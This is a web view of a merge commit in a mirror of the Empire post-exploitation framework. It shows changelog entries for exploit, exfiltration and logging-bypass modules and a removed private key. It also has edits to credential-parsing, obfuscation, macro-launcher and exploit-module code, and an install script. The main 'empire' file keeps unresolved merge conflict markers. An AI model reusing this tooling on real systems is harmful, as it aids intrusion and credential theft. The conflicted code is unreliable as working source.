infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merged with master

websockets-multiuser
xorrior 2017-10-12 12:15:44 -04:00
parent 2df99d25fd eccdbfb7cd
commit 4aea7272f0
18 changed files with 128 additions and 259 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
changelog
View File

@ -14,18 +14,24 @@ Running
- Improved ScriptBlock logging bypasses #740 @cobbr_io
- Slack Integration - Notification for new Agents #737 @dchrastil
- Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers
- Fix Eternal Blue Issue #656
- Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663
- Fix Macro syntax error per @utkusen issue #664
- Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr
- Fix creds manual add parsing with whitespace in password
- Fix validate length parameter attribute for Invoke-PSInject.ps1d
8/28/2017
--------
- Version 2.1 Master Release
-Add get schwifty trollsploit module @424f424f
-Add -sta flag to launcher @xorrior
-Fixed hardoced cert path @xorrior
-Fixed hardcoded cert path @xorrior
-Fix for #567
-Merge Capture OSX credentials from Prompt Module in Empire DB @malcomvetter.
-Rest Api fixups #526 @byt3bl33d3r
-Rest API fixups #526 @byt3bl33d3r
-Added MS16-135 exploit module @ThePirateWhoSmellsOfSunflowers
-Updated Bloodhound Ingestion module @rvrsh3ll
-Updated Bloodhound Ingestion module @424f424f
-Added Dropbox exfil module @ktevora1
-Added EternalBlue module @ktevora1
-Fix SSL certificate issue with Flask @diskonnect
@ -37,7 +43,7 @@ Running
-Add SandboxMode to evade Apple Sandbox protection on applescript #578 @dchrastil
-Add Obfuscated Empire #597 @cobbr
-Add Bypass ScriptBlock Logging #603 @cobbr
-Add mimipenguin module @rvrsh3ll
-Add mimipenguin module @424f424f
-Add dyld_print_to_file Mac privesc @checkyfuntime
-Added manual proxy specifications @xorrior
-Fix libssl-dev and libssl1.0.0 packages @xorrior

46
data/empire.pem
View File

@ -1,46 +0,0 @@
-----BEGIN PRIVATE KEY-----
MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQDT8qCR+GR2lVKG
M6G7pABaOIfCQKvzO3eckz8q+jVq2HgI34AvIg4tctgEnh4r1euxKtMkkSRmvedT
zZgPKh0UaEjROs5rIbXeRhqE7Ey6oVXcJG7DLYZ/Awk1G3Yi+TmtzRGGfE3VJ61O
V+gzTH2Q7jayFF1sNdpBk2Rs4I2VU46k/UWyHnPzIxbPlkBa5D/LiPnI+/b6qpqk
p/fsvewb6Xqb3PujemF+y/4jiHDtE9KicgxDh9u3niTi8Bg7fOWfBbhMaGIzITkK
WFXpJe9feDqxhoys5qUh8hfccFdNXz6QCBZiw5COq6s8ybimOBrmEs09IdGZi86T
bwGOQI3XAgMBAAECggEBANNjZiqwJuLuw0P+MwzG4WMahqyDe/w4D3AmnBXtP2G1
TOLspxhbSvChXjocydLGpTAqmjQaXsfqF9JJd6OISUCVUir8D+xhztZF7SUt2Mk7
KDtMSvx3Z3E+Qeyp2wW+tHxXz2bmi2pRDFTa8EhZvdLTA9JQ5WyLuYc1zi+ZNxz6
SzybS0Th9RJT0crPuhxEHxAN50pc61trRnI2YHYTaW4ArRbNFXImqRLsU9l9h9kz
VVlVoP9oIJos2a40Osi3Du+6tmVFWcs9+fxxNnY1sfVrAVk6nHI40Vln4Ul+BZyo
ZP8SMnxI9NoSMJahymjkcZad3tbwgvjq+yaQck1alGECgYEA/V14iLkCJoUK6dmU
zhR8p3Pycxy19s0CSSqPYvvnENfxarimOHW6nIMu0eDMXLVnIHAXsr81zWkeh4eP
GPEUSqclGwkXp4yHirMtoTFWhbo16QMSEFBKUHmwNJNSzScLR5jRGgVJapXr+qsN
WNlR3ifF+Ki6f87io9u8/rwUut0CgYEA1ibkSUs2POa0UcAXtE7G/Rsc7aEuVo9b
U+I5uIhMvveKm0Ff2oo1yQzDSxmjFhYzBeXsBQ6Jy796EcaLFpUc9H08kOsJq9gP
JAfSMljLasrqqAQ6J37CAmbEqHQ3MEdEFqUIk6Cf0iVmphXexd7LaDx2IuAy5Kfn
3MXH4KVo3kMCgYA2Yv4guzYO9rglAqPCqPspJuaAd0VIOTGoaw5kfRZYs0ILWp+z
tvHb7vz56Ht12yrL98PehtURxuLazOqWvAlTDRYV+5msSao+x7+fvmuIQTSZVCNo
hROuurBsWMOJbjwpnlAkecYMryn8oQM4c03zli4U9oMyNELKUbz8IXuBsQKBgQC0
4/klKBDSdJWQEFB1j61qEsLmvqVjnIgqXQcgppEdJf/AkQIkmWZBQzSbdTZa67mB
m+s3gkZHAqBb73eBRcdFhZvpVX+/1itD5g9ZU8PPm0OHVLrCrcG3QZOQL0qGz0vm
TNTnzl/xpIIGfKbGQSFUFO49G2Ah4Oprg+0IBvCD/QKBgQCZcIjPZDWMIRg/Q4Fj
ypUb59p8wCQHMuZNwuxRTwjQkAp3xpqYNIBafHSlPzNf8BWzx+orsLnh6RJbA8uB
9++4Wu01u4JofuGdVqN73AJBx8eQEJkJsPNEwxSv4Swzwkw5mGkqi5UzPFMlwwQi
DIF8+rA64PoZDIUB3UkV0i70ng==
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIC8DCCAdigAwIBAgIJAIVXuX8kX4CxMA0GCSqGSIb3DQEBCwUAMA0xCzAJBgNV
BAYTAlVTMB4XDTE3MDUxNzA1NDkxNVoXDTE4MDUxNzA1NDkxNVowDTELMAkGA1UE
BhMCVVMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDT8qCR+GR2lVKG
M6G7pABaOIfCQKvzO3eckz8q+jVq2HgI34AvIg4tctgEnh4r1euxKtMkkSRmvedT
zZgPKh0UaEjROs5rIbXeRhqE7Ey6oVXcJG7DLYZ/Awk1G3Yi+TmtzRGGfE3VJ61O
V+gzTH2Q7jayFF1sNdpBk2Rs4I2VU46k/UWyHnPzIxbPlkBa5D/LiPnI+/b6qpqk
p/fsvewb6Xqb3PujemF+y/4jiHDtE9KicgxDh9u3niTi8Bg7fOWfBbhMaGIzITkK
WFXpJe9feDqxhoys5qUh8hfccFdNXz6QCBZiw5COq6s8ybimOBrmEs09IdGZi86T
bwGOQI3XAgMBAAGjUzBRMB0GA1UdDgQWBBRietD7PGv5ivWBLRJMyra4elWlLjAf
BgNVHSMEGDAWgBRietD7PGv5ivWBLRJMyra4elWlLjAPBgNVHRMBAf8EBTADAQH/
MA0GCSqGSIb3DQEBCwUAA4IBAQCOU0aqgYba7aD7/7pV3rZrTFC+kwUs3TZ0/xWi
CZA8aN5+TRQDdvOUM1fqyJx5Y7uv+V9gafHwJAc7FZ9643zS6Zt0I2eUrbP9dmg7
sj8u19Isdy0EetDGXeyA7r+BRUSkFpKbXZYWE7rUr7t3QkROyGbU2ebEE/S2RnBc
A+/d7waKqIyu7wlmcP2jUgQjiwDiWJAuGeb9gJGsTjCj1I4z6rk6/xpnXV70ovG7
jUNm6tOTkxB5pgEel/2gHs/KZVld9gYSoh5GnJWtlFQYvZGaMEK419hfTMElLoQY
8JL+XvYxkA/4+zXtQS3ZgslAAZlh96Nx8SU8QWJ4qJ2jYQJg
-----END CERTIFICATE-----

2
data/module_source/credentials/Invoke-Kerberoast.ps1
View File

@ -1082,4 +1082,4 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
}

19
empire
View File

@ -4,11 +4,17 @@ import sqlite3, argparse, sys, argparse, logging, json, string
import os, re, time, signal, copy, base64, pickle
from flask import Flask, request, jsonify, make_response, abort, url_for
from time import localtime, strftime, sleep
<<<<<<< HEAD
import hashlib
from OpenSSL import SSL
from Crypto.Random import random
import ssl
=======
from OpenSSL import SSL
from Crypto.Random import random
import ssl
>>>>>>> master
# Empire imports
from lib.common import empire
from lib.common import helpers
@ -200,7 +206,6 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
# suppress all stdout and don't initiate the main cmdloop
sys.stdout = open(os.devnull, 'w')
# validate API token before every request except for the login URI
@app.before_request
def check_token():
@ -1221,7 +1226,10 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
signal.signal(signal.SIGINT, signal.default_int_handler)
sys.exit()
<<<<<<< HEAD
=======
>>>>>>> master
try:
signal.signal(signal.SIGINT, signal_handler)
except ValueError:
@ -1234,7 +1242,6 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
app.run(host='0.0.0.0', port=int(port), ssl_context=context, threaded=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
@ -1267,7 +1274,11 @@ if __name__ == '__main__':
print empire.VERSION
elif args.rest:
<<<<<<< HEAD
# start an Empire instance and RESTful API
=======
# start an Empire instance and RESTful API
>>>>>>> master
main = empire.MainMenu(args=args)
def thread_api(empireMenu):
while serverExitCommand == 'restart':
@ -1290,7 +1301,11 @@ if __name__ == '__main__':
start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport)
except SystemExit as e:
pass
<<<<<<< HEAD
=======
>>>>>>> master
else:
# normal execution
main = empire.MainMenu(args=args)

57
lib/common/helpers.py
View File

@ -67,7 +67,7 @@ def validate_ip(IP):
"""
Uses iptools to validate an IP.
"""
try:
try:
validate_IPv4 = iptools.ipv4.validate_ip(IP)
validate_IPv6 = iptools.ipv6.validate_ip(IP)
@ -93,7 +93,7 @@ def validate_ntlm(data):
def generate_ip_list(s):
"""
Takes a comma separated list of IP/range/CIDR addresses and
Takes a comma separated list of IP/range/CIDR addresses and
generates an IP range list.
"""
@ -105,7 +105,7 @@ def generate_ip_list(s):
ranges = ""
if s and s != "":
parts = s.split(",")
for part in parts:
p = part.split("-")
if len(p) == 2:
@ -121,7 +121,7 @@ def generate_ip_list(s):
return eval("iptools.IpRangeList("+ranges+")")
else:
return None
else:
return None
@ -213,13 +213,13 @@ def strip_powershell_comments(data):
Strip block comments, line comments, empty lines, verbose statements,
and debug statements from a PowerShell source file.
"""
# strip block comments
strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '\n', data)
# strip blank lines, lines starting with #, and verbose/debug statements
strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )])
return strippedCode
@ -239,7 +239,7 @@ def get_powerview_psreflect_overhead(script):
else:
# otherwise extracting from PowerView
pattern = re.compile(r'\n\$Mod =.*\[\'wtsapi32\'\]', re.DOTALL)
try:
return strip_powershell_comments(pattern.findall(script)[0])
except:
@ -249,7 +249,7 @@ def get_powerview_psreflect_overhead(script):
def get_dependent_functions(code, functionNames):
"""
Helper that takes a chunk of PowerShell code and a set of function
Helper that takes a chunk of PowerShell code and a set of function
names and returns the unique set of function names within the script block.
"""
@ -309,13 +309,13 @@ def find_all_dependent_functions(functions, functionsToProcess, resultFunctions=
def generate_dynamic_powershell_script(script, functionNames):
"""
Takes a PowerShell script and a function name (or array of function names,
generates a dictionary of "[functionNames] -> functionCode", and recursively
generates a dictionary of "[functionNames] -> functionCode", and recursively
maps all dependent functions for the specified function name.
A script is returned with only the code necessary for the given
functionName, stripped of comments and whitespace.
Note: for PowerView, it will also dynamically detect if psreflect
Note: for PowerView, it will also dynamically detect if psreflect
overhead is needed and add it to the result script.
"""
@ -337,7 +337,7 @@ def generate_dynamic_powershell_script(script, functionNames):
# start building the new result script
functionDependencies = []
for functionName in functionNames:
for functionName in functionNames:
functionDependencies += find_all_dependent_functions(functions, functionName, [])
functionDependencies = unique(functionDependencies)
@ -371,12 +371,12 @@ def parse_credentials(data):
if parts[0].startswith("Hostname:"):
return parse_mimikatz(data)
# collection/prompt output
# powershell/collection/prompt output
elif parts[0].startswith("[+] Prompted credentials:"):
parts = parts[0].split("->")
if len(parts) == 2:
username = parts[1].split(":",1)[0].strip()
password = parts[1].split(":",1)[1].strip()
@ -385,13 +385,20 @@ def parse_credentials(data):
username = username.split("\\")[1].strip()
else:
domain = ""
return [("plaintext", domain, username, password, "", "")]
else:
print color("[!] Error in parsing prompted credential output.")
return None
# python/collection/prompt (Mac OS)
elif "text returned:" in parts[0]:
parts2 = parts[0].split("text returned:")
if len(parts2) >= 2:
password = parts2[-1]
return [("plaintext", "", "", password, "", "")]
else:
return None
@ -433,7 +440,7 @@ def parse_mimikatz(data):
lines2 = match.split("\n")
username, domain, password = "", "", ""
for line in lines2:
try:
if "Username" in line:
@ -446,7 +453,7 @@ def parse_mimikatz(data):
pass
if username != "" and password != "" and password != "(null)":
sid = ""
# substitute the FQDN in if it matches
@ -567,7 +574,7 @@ def get_datetime():
Return the current date/time
"""
return strftime("%Y-%m-%d %H:%M:%S", localtime())
def get_file_datetime():
"""
@ -630,7 +637,7 @@ def lhost():
for ifname in interfaces:
if "lo" not in ifname:
try:
ip = get_interface_ip(ifname)
ip = get_interface_ip(ifname)
if ip != "":
break
except:
@ -643,11 +650,11 @@ def color(string, color=None):
"""
Change text color for the Linux terminal.
"""
attr = []
# bold
attr.append('1')
if color:
if color.lower() == "red":
attr.append('31')
@ -674,7 +681,7 @@ def color(string, color=None):
def unique(seq, idfun=None):
"""
Uniquifies a list, order preserving.
from http://www.peterbe.com/plog/uniqifiers-benchmark
"""
if idfun is None:
@ -695,7 +702,7 @@ def unique(seq, idfun=None):
def uniquify_tuples(tuples):
"""
Uniquifies Mimikatz tuples based on the password.
cred format- (credType, domain, username, password, hostname, sid)
"""
seen = set()
@ -740,7 +747,7 @@ def complete_path(text, line, arg=False):
else:
# if we have "command path"
argData = line.split()[0:]
if not argData or len(argData) == 1:
completions = os.listdir('./')
else:
@ -748,7 +755,7 @@ def complete_path(text, line, arg=False):
if part == '':
dir = './'
elif dir == '':
dir = '/'
dir = '/'
completions = []
for f in os.listdir(dir):

1
lib/common/listeners.py
View File

@ -13,7 +13,6 @@ import pickle
import hashlib
import copy
class Listeners:
"""
Listener handling class.

1
lib/listeners/http.py
View File

@ -7,7 +7,6 @@ import time
import copy
from pydispatch import dispatcher
from flask import Flask, request, make_response
import pdb
# Empire imports
from lib.common import helpers
from lib.common import agents

2
lib/listeners/http_mapi.py
View File

@ -263,6 +263,7 @@ class Listener:
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
folder = listenerOptions['Folder']['Value']
if language.lower() == 'powershell':
@ -325,6 +326,7 @@ class Listener:
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
folder = listenerOptions['Folder']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':

4
lib/modules/powershell/exploitation/exploit_eternalblue.py
View File

@ -77,7 +77,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-EternalBlue.ps1"
@ -105,4 +105,4 @@ class Module:
script += "; 'Exploit complete'"
return script
return script

1
lib/modules/powershell/persistence/powerbreach/eventlog.py
View File

@ -1,5 +1,6 @@
import os
from lib.common import helpers
import pdb
class Module:

5
lib/modules/powershell/privesc/ms16-135.py
View File

@ -73,7 +73,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-MS16135.ps1"
try:
@ -101,5 +101,6 @@ class Module:
script += 'Invoke-MS16135 -Command "' + launcherCode + '"'
script += ';`nInvoke-MS16135 completed.'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script

137
lib/modules/python/management/osx/ls.py
View File

@ -1,137 +0,0 @@
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'ls',
# list of one or more authors for the module
'Author': ['@xorrior'],
# more verbose multi-line description of the module
'Description': ('List contents of a directory'),
# True if the module needs to run in the background
'Background': False,
# File extension to save the file as
# no need to base64 return data
'OutputExtension': None,
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe': True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
'Link:',
'http://stackoverflow.com/questions/17809386/how-to-convert-a-stat-output-to-a-unix-permissions-string'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent': {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to run the module.',
'Required' : True,
'Value' : ''
},
'Path': {
'Description' : 'Path. Defaults to the current directory. This module is mainly for organization. The alias \'ls\' can be used at the agent menu.',
'Required' : True,
'Value' : '.'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
filePath = self.options['Path']['Value']
filePath += '/'
script = """
try:
import Foundation
from AppKit import *
import os
import stat
except:
print "A required module is missing.."
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%%s%%s' %% (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
path = "%s"
dirlist = os.listdir(path)
filemgr = NSFileManager.defaultManager()
directoryListString = "\\t\\towner\\tgroup\\t\\tlast modified\\tsize\\t\\tname\\n"
for item in dirlist:
fullpath = os.path.abspath(os.path.join(path,item))
attrs = filemgr.attributesOfItemAtPath_error_(os.path.abspath(fullpath), None)
name = item
lastModified = str(attrs[0]['NSFileModificationDate'])
group = str(attrs[0]['NSFileGroupOwnerAccountName'])
owner = str(attrs[0]['NSFileOwnerAccountName'])
size = str(os.path.getsize(fullpath))
if int(size) > 1024:
size = int(size) / 1024
size = str(size) + "K"
else:
size += "B"
perms = permissions_to_unix_name(os.stat(fullpath)[0])
listString = perms + " " + owner + "\\t" + group + "\\t\\t" + lastModified.split(" ")[0] + "\\t" + size + "\\t\\t" + name + "\\n"
if os.path.isdir(fullpath):
listString = "d"+listString
else:
listString = "-"+listString
directoryListString += listString
print str(os.getcwd())
print directoryListString
""" % filePath
return script

4
lib/powershell/Invoke-Obfuscation/Out-ObfuscatedStringCommand.ps1
View File

@ -810,7 +810,7 @@ http://www.danielbohannon.com
# Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed.
# E.g. "testin`G" in reverse would be "G`nitset" where `n would be interpreted as a newline character.
$SpecialCharacters = @('a','b','f','n','r','t','v','0')
$SpecialCharacters = @('a','b','f','n','r','u','t','v','0')
ForEach($SpecialChar in $SpecialCharacters)
{
If($ScriptString.Contains("``"+$SpecialChar))
@ -900,4 +900,4 @@ http://www.danielbohannon.com
$ScriptString = (Get-Random -Input $InvokeOptions)
Return $ScriptString
}
}

2
lib/powershell/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1
View File

@ -1032,7 +1032,7 @@ http://www.danielbohannon.com
$CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate)
# Special characters in PowerShell must be upper-cased before adding a tick before the character.
$SpecialCharacters = @('a','b','f','n','r','t','v')
$SpecialCharacters = @('a','b','f','n','r','u','t','v','0')
# Remove the possibility of a single tick being placed only before the token string.
# This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation.

2
lib/stagers/windows/bunny.py
View File

@ -9,7 +9,7 @@ class Stager:
'Author': ['@kisasondi','@harmj0y'],
'Description': ('Generates a bunny script that runes a one-liner stage0 launcher for Empire.'),
'Description': ('Generates a bunny script that runs a one-liner stage0 launcher for Empire.'),
'Comments': [
'This stager is modification of the ducky stager by @harmj0y,',

2
lib/stagers/windows/macro.py
View File

@ -104,7 +104,7 @@ class Stager:
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
chunks = list(helpers.chunks(launcher.replace("'", "\\'"), 50))
chunks = list(helpers.chunks(launcher, 50))
payload = "\tDim "+Str+" As String\n"
payload += "\t"+Str+" = \"" + str(chunks[0]) + "\"\n"
for chunk in chunks[1:]:

1
setup/bomutils Submodule

@ -0,0 +1 @@
Subproject commit 3f7dc2dbbc36ca1c957ec629970026f45594a52c

87
setup/install.sh
View File

@ -47,17 +47,27 @@ elif lsb_release -d | grep -q "Kali"; then
pip install zlib_wrapper
pip install netifaces
if ! which powershell > /dev/null; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-7_amd64.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.16/powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -y libunwind8
dpkg -i libicu55_55.1-7_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
dpkg -i powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -f -y
rm libicu55_55.1-7_amd64.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
rm powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
if uname -a | grep -q amd64; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu52_52.1-3_amd64.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
dpkg -i libicu52_52.1-3_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
rm libicu52_52.1-3_amd64.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
elif uname -a | grep -q i386; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu52_52.1-3_i386.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
dpkg -i libicu52_52.1-3_i386.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
rm libicu52_52.1-3_i386.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
fi
curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -
curl https://packages.microsoft.com/config/ubuntu/14.04/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list
apt-get update
apt-get install -y powershell
rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY
fi
mkdir -p /usr/local/share/powershell/Modules
cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules
@ -78,17 +88,15 @@ elif lsb_release -d | grep -q "Ubuntu"; then
pip install zlib_wrapper
pip install netifaces
if ! which powershell > /dev/null; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-7_amd64.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.16/powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -y libunwind8
dpkg -i libicu55_55.1-7_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
dpkg -i powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -f -y
rm libicu55_55.1-7_amd64.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
rm powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -
if lsb_release -r | grep -q "14.04"; then
curl https://packages.microsoft.com/config/ubuntu/14.04/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list
elif lsb_release -r | grep -q "16.04"; then
curl https://packages.microsoft.com/config/ubuntu/16.04/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list
fi
apt-get update
apt-get install -y powershell
rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY
fi
mkdir -p /usr/local/share/powershell/Modules
cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules
@ -108,19 +116,32 @@ else
pip install 'pyopenssl==17.2.0'
pip install zlib_wrapper
pip install netifaces
pip install M2Crypto
if ! which powershell > /dev/null; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-7_amd64.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.16/powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -y libunwind8
dpkg -i libicu55_55.1-7_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
dpkg -i powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -f -y
rm libicu55_55.1-7_amd64.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
rm powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
if lsb_release -d | grep -q Debian | grep 9; then
if uname -a | grep -q amd64; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu52_52.1-3_amd64.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
dpkg -i libicu52_52.1-3_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
rm libicu52_52.1-3_amd64.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
elif uname -a | grep -q i386; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu52_52.1-3_i386.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
dpkg -i libicu52_52.1-3_i386.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
rm libicu52_52.1-3_i386.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
fi
fi
curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -
curl https://packages.microsoft.com/config/ubuntu/14.04/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list
apt-get update
apt-get install -y powershell
rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY
fi
mkdir -p /usr/local/share/powershell/Modules
cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules
fi